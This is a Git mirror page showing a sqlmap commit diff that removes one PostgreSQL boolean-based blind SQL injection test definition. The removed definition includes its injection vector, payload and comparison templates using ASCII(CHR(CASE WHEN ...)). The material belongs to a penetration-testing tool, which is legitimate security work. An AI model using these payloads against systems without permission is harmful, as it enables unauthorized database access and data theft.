mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-16 03:02:20 +03:00
ASCII & CHR is quite common, so removing this one
This commit is contained in:
parent
a1619f84b6
commit
5aa958a146
|
@ -726,21 +726,6 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
|
||||||
<title>PostgreSQL boolean-based blind - Parameter replace</title>
|
|
||||||
<stype>1</stype>
|
|
||||||
<level>4</level>
|
|
||||||
<risk>1</risk>
|
|
||||||
<clause>1,2,3</clause>
|
|
||||||
<where>3</where>
|
|
||||||
<vector>ASCII(CHR(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0 END))</vector>
|
|
||||||
<request>
|
|
||||||
<payload>ASCII(CHR(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0 END))</payload>
|
|
||||||
</request>
|
|
||||||
<response>
|
|
||||||
<comparison>ASCII(CHR(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0 END))</comparison>
|
|
||||||
</response>
|
|
||||||
</test>
|
|
||||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
||||||
<!-- End of boolean-based blind tests - Parameter replace -->
|
<!-- End of boolean-based blind tests - Parameter replace -->
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user